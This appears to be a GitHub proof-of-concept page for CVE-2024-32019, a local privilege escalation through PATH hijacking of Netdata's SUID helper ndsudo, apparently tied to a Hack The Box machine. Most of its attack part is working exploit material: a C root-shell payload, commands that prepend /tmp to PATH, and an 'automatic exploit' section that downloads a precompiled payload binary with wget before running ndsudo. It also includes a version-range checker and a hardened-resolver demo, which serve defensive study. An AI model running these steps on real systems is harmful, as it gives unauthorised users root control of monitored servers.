CVE-2024-32019 PoC: Netdata security vulnerability

Source
Related vulnerability
Title: Netdata security vulnerability (CVE-2024-32019)
Description: Netdata is an open-source, high-fidelity infrastructure monitoring and troubleshooting application by Netdata. Netdata contains a security vulnerability that an attacker can use to run arbitrary programs with root privileges.
Description
Netdata ndsudo local privilege escalation workflow and PoC (CVE-2024-32019)
Introduction
# CVE-2024-32019-POC
Netdata ndsudo local privilege escalation workflow and PoC (CVE-2024-32019)

- [Workflow](#workflow)
- [Automatic exploit](#automatic-exploit)
- [Resources](#resources)

## Workflow
> [!TIP]
> Please read

Netdata is an application and system monitoring tool. Its web interface listens on TCP port 19999 by default, so it is easy to spot:

```shell
test@test:~$ netstat -tuln
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State     

tcp        0      0 127.0.0.1:19999         0.0.0.0:*               LISTEN  
```

This vulnerability (CVE-2024-32019) **affects** the following versions: `>= v1.45.0, < v1.45.3` (stable releases) and `>= v1.44.0-60, < v1.45.0-169` (nightly builds). A single HTTP request to the service reveals the running version in the response headers:

<img width="605" height="289" alt="CVE-2024-32019-1" src="https://github.com/user-attachments/assets/121b7527-1c0b-4564-abd9-1b663bfe94f8" />
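To triage the version string you pull from the server against those two ranges without eyeballing it, here is an added example in C (written for this page, not code from the PoC repository or from Netdata). It assumes the formats `vX.Y.Z` for stable releases and `vX.Y.Z-N[-nightly]` for nightly builds, where the `-N` build number marks a nightly; the sample strings in `main` are constructed.

```c
/* Added example (not part of the PoC or of Netdata): classify a Netdata
 * version string against the affected ranges for CVE-2024-32019.
 *   stable releases:  >= v1.45.0     and < v1.45.3
 *   nightly builds:   >= v1.44.0-60  and < v1.45.0-169
 * Assumption: a "-N" build number after the patch level marks a nightly. */
#include <stdio.h>
#include <string.h>

struct ndver { int major, minor, patch, build, nightly; };

/* Accepts "v1.45.2", "1.45.2" or "v1.44.0-60-nightly". Returns 0 on failure. */
static int parse_ndver(const char *s, struct ndver *v) {
    if (!s) return 0;
    if (*s == 'v' || *s == 'V') s++;
    memset(v, 0, sizeof *v);
    int n = sscanf(s, "%d.%d.%d-%d", &v->major, &v->minor, &v->patch, &v->build);
    if (n < 3) return 0;
    v->nightly = (n == 4);          /* a build number was present */
    return 1;
}

/* Lexicographic compare of (major, minor, patch, build). */
static int ndver_cmp(const struct ndver *a, const struct ndver *b) {
    int d = a->major - b->major; if (d) return d;
    d = a->minor - b->minor;     if (d) return d;
    d = a->patch - b->patch;     if (d) return d;
    return a->build - b->build;
}

/* Returns 1 if the version is in an affected range, 0 if not,
 * -1 if the string could not be parsed. */
int ndver_affected(const char *s) {
    struct ndver v;
    if (!parse_ndver(s, &v)) return -1;
    if (v.nightly) {
        struct ndver lo = {1, 44, 0, 60, 1}, hi = {1, 45, 0, 169, 1};
        return ndver_cmp(&v, &lo) >= 0 && ndver_cmp(&v, &hi) < 0;
    } else {
        struct ndver lo = {1, 45, 0, 0, 0}, hi = {1, 45, 3, 0, 0};
        return ndver_cmp(&v, &lo) >= 0 && ndver_cmp(&v, &hi) < 0;
    }
}

int main(void) {
    /* Constructed sample strings, not taken from any real server. */
    const char *samples[] = { "v1.45.2", "v1.45.3", "v1.44.0-60-nightly", "v1.45.0-169-nightly" };
    for (size_t i = 0; i < sizeof samples / sizeof *samples; i++) {
        int r = ndver_affected(samples[i]);
        printf("%-22s %s\n", samples[i], r < 0 ? "unparseable" : r ? "AFFECTED" : "not affected");
    }
    return 0;
}
```

The upper bounds are exclusive, so `v1.45.3` and `v1.45.0-169` (the fixed builds named in the advisory) come back as not affected, while `v1.45.0` and `v1.44.0-60` are the first affected ones.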


The exploit relies on **PATH hijacking** of one of Netdata's helper plugins, `ndsudo`, which is commonly found under `/opt/netdata/usr/libexec/netdata/` and is installed SUID root.

```shell
test@test:~$ find / -name ndsudo 2> /dev/null
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo
```

<img width="1064" height="51" alt="CVE-2024-32019-2" src="https://github.com/user-attachments/assets/3bfa95c7-614c-48a9-b95f-267ebf26475c" />


Its `--help` output lists the commands it knows how to run:

```shell
$ /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo --help

ndsudo

(C) Netdata Inc.

A helper to allow Netdata run privileged commands.

  --test
    print the generated command that will be run, without running it.

  --help
    print this message.

The following commands are supported:

- Command    : nvme-list
  Executables: nvme 
  Parameters : list --output-format=json

- Command    : nvme-smart-log
  Executables: nvme 
  Parameters : smart-log {{device}} --output-format=json

- Command    : megacli-disk-info
  Executables: megacli MegaCli 
  Parameters : -LDPDInfo -aAll -NoLog

- Command    : megacli-battery-info
  Executables: megacli MegaCli 
  Parameters : -AdpBbuCmd -aAll -NoLog

- Command    : arcconf-ld-info
  Executables: arcconf 
  Parameters : GETCONFIG 1 LD

- Command    : arcconf-pd-info
  Executables: arcconf 
  Parameters : GETCONFIG 1 PD

The program searches for executables in the system path.

Variables given as {{variable}} are expected on the command line as:
  --variable VALUE

VALUE can include space, A-Z, a-z, 0-9, _, -, /, and .
```

```shell
test@test:~$ /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo arcconf-ld-info
arcconf : not available in PATH.
```

As the help text says, each command maps to a bare executable name (`nvme`, `megacli`, `arcconf`, ...) that ndsudo resolves by searching the PATH it inherited from the caller. Because the binary is SUID root, we can place our own executable with one of those names in a directory we control and prepend that directory to PATH; ndsudo will then find it first and execute it with root privileges.
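The following added example (written for this page, not taken from ndsudo or Netdata) shows the two ways a SUID helper can turn a command name into a path: the vulnerable way, through the caller's `PATH`, and a hardened way that consults only a fixed list of root-owned directories. `demo_path_hijack` builds the attacker's side in a temporary directory (a fake `arcconf` script; the directory name and the trusted-directory list are assumptions) and reports which resolver gets fooled.

```c
/* Added example (not ndsudo's code): PATH-based command resolution in a
 * privileged helper, vulnerable form next to a fixed-directory form. */
#ifndef _DEFAULT_SOURCE
#define _DEFAULT_SOURCE 1
#endif
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

#define PATHBUF 4096

/* True if path is a regular file with the owner execute bit set. */
static int is_executable(const char *path) {
    struct stat st;
    return stat(path, &st) == 0 && S_ISREG(st.st_mode) && (st.st_mode & S_IXUSR);
}

/* Search a colon-separated directory list for cmd. On success copies the
 * full path into out and returns 1; returns 0 if nothing matched. */
static int find_in_dirs(const char *cmd, const char *dirs, char *out, size_t outlen) {
    const char *p = dirs;
    while (p && *p) {
        const char *colon = strchr(p, ':');
        size_t len = colon ? (size_t)(colon - p) : strlen(p);
        if (len > 0) {  /* skip empty entries, which would mean "cwd" */
            int n = snprintf(out, outlen, "%.*s/%s", (int)len, p, cmd);
            if (n > 0 && (size_t)n < outlen && is_executable(out)) return 1;
        }
        p = colon ? colon + 1 : NULL;
    }
    return 0;
}

/* Vulnerable resolver: trusts PATH exactly as the unprivileged caller set it. */
int resolve_vulnerable(const char *cmd, char *out, size_t outlen) {
    const char *path = getenv("PATH");
    return path ? find_in_dirs(cmd, path, out, outlen) : 0;
}

/* Hardened resolver: ignores the environment and only looks in directories
 * fixed at compile time (this particular list is an assumption for the demo). */
static const char TRUSTED_DIRS[] =
    "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin";

int resolve_hardened(const char *cmd, char *out, size_t outlen) {
    return find_in_dirs(cmd, TRUSTED_DIRS, out, outlen);
}

/* Plant a fake "arcconf" in a temporary directory, prepend that directory
 * to PATH and resolve the name both ways. Returns 1 when the vulnerable
 * resolver picks the planted file and the hardened one does not. */
int demo_path_hijack(void) {
    char dir[] = "/tmp/ndsudo-demo-XXXXXX";   /* constructed for the demo */
    if (!mkdtemp(dir)) return 0;

    char fake[PATHBUF];
    snprintf(fake, sizeof fake, "%s/arcconf", dir);
    FILE *f = fopen(fake, "w");
    if (!f) { rmdir(dir); return 0; }
    fputs("#!/bin/sh\necho hijacked\n", f);   /* stand-in for the root-shell payload */
    fclose(f);
    chmod(fake, 0755);

    const char *old = getenv("PATH");
    char saved[PATHBUF] = "", newpath[PATHBUF];
    if (old) snprintf(saved, sizeof saved, "%s", old);
    snprintf(newpath, sizeof newpath, "%s:%s", dir, saved);
    setenv("PATH", newpath, 1);               /* what the attacker does in the shell */

    char v[PATHBUF] = "", h[PATHBUF] = "";
    int vul  = resolve_vulnerable("arcconf", v, sizeof v);
    int hard = resolve_hardened("arcconf", h, sizeof h);

    if (old) setenv("PATH", saved, 1); else unsetenv("PATH");   /* restore */
    unlink(fake);
    rmdir(dir);

    return vul && strcmp(v, fake) == 0 && !(hard && strcmp(h, fake) == 0);
}

int main(void) {
    puts(demo_path_hijack()
         ? "PATH-based resolver picked the planted arcconf; fixed-list resolver did not"
         : "demo could not be set up");
    return 0;
}
```

Build and run with `gcc demo.c -o demo && ./demo`. The directory list itself is not the point: a SUID helper should reset or clear the inherited environment rather than trust `PATH`, and should check that what it resolved is a regular file owned by root before executing it.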

The payload does not have to be written in C just because Netdata is; any executable will do, but a small C program that spawns a root shell is convenient to build and run:

<img width="1127" height="1157" alt="CVE-2024-32019" src="https://github.com/user-attachments/assets/5b9ca43a-3bf4-4158-ae04-956acbce4660" />


```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Payload that ndsudo will exec in place of the real `arcconf`.
 * ndsudo is SUID root, so this runs with root privileges; we make them
 * the real uid/gid as well and then hand over to bash. The -p flag stops
 * bash from dropping an effective uid that differs from the real one. */
int main(void) {
    setuid(0);
    setgid(0);
    execl("/bin/bash", "bash", "-p", (char *)NULL);
    perror("execl");   /* only reached if the exec failed */
    return 1;
}
```

```shell
gcc arcconf.c -o arcconf
```

Then, as discussed, we prepend the directory holding our binary to PATH; ndsudo inherits this PATH when we run it:

```shell
test@test:/tmp$ PATH=/tmp:$PATH
```


Finally, we run the command that maps to our malicious executable (`arcconf-pd-info` resolves `arcconf`); ndsudo finds our binary first in PATH and we get a root shell:
```shell
test@test:/tmp$ /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo arcconf-pd-info
root@editor:/tmp# whoami
root
```

## Automatic exploit 

You can download a precompiled build of the C payload shown above, which drops you into a bash running as root:

```shell
wget https://github.com/juanbelin/CVE-2024-32019-POC/raw/refs/heads/main/arcconf 
```

```shell
mv arcconf /tmp #If your target has Internet connectivity

scp ./arcconf test@test:/tmp/arcconf #If your target does not have Internet connectivity
```

```shell
PATH=/tmp:$PATH
```

```shell
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo arcconf-ld-info #The ndsudo path may change 
```


## Resources 

- https://learn.netdata.cloud/docs/collecting-metrics/

- https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93

- https://app.hackthebox.com/machines/684